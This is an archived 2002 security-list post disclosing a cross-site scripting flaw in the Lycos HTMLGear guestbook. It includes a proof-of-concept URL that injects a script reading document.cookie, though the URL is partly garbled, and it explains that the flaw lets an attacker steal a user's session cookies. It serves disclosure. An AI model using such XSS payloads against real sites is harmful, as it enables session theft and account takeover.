XSS in lycos htmlgear guestbook

From: Pistone (jorgepat_private)
Date: Mon Jul 15 2002 - 10:32:24 PDT

Next message: CERT(R) Coordination Center: "VU#197395"

Previous message: Keith Tyler: "MSNBC Article [7.8.2002 44916] Notice of Copyright Infring ement]"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1


 URL:  Htmlgear.lycos.com
 
 If a malicious user can get the guestbook user to follow
 a simple link, then they can grab that users htmlgear
 cookies and possibly use them to authenticate as that
 user.
 
 
 WORKING EXAMPLE

http://htmlgear.lycos.com/guest/control.guest?u=usuario3&i=1&a=view
lert(document.cookie)</script

 the support of lycos receives a copy of the problem
 
 
 Salu"
 
 Pistone
 - -----------------
 www.gauchohack.com.ar
 
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org

iD8DBQE9MwcyY47Vx76lNPkRApjSAJ9DlpPy4yanxPXKPdy4AGpujFqjeACgoIA2
rixgTR3+M3K29PtPNmGHNEg=
=2z2c
-----END PGP SIGNATURE-----

Next message: CERT(R) Coordination Center: "VU#197395"
Previous message: Keith Tyler: "MSNBC Article [7.8.2002 44916] Notice of Copyright Infring ement]"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Mon Jul 15 2002 - 11:09:25 PDT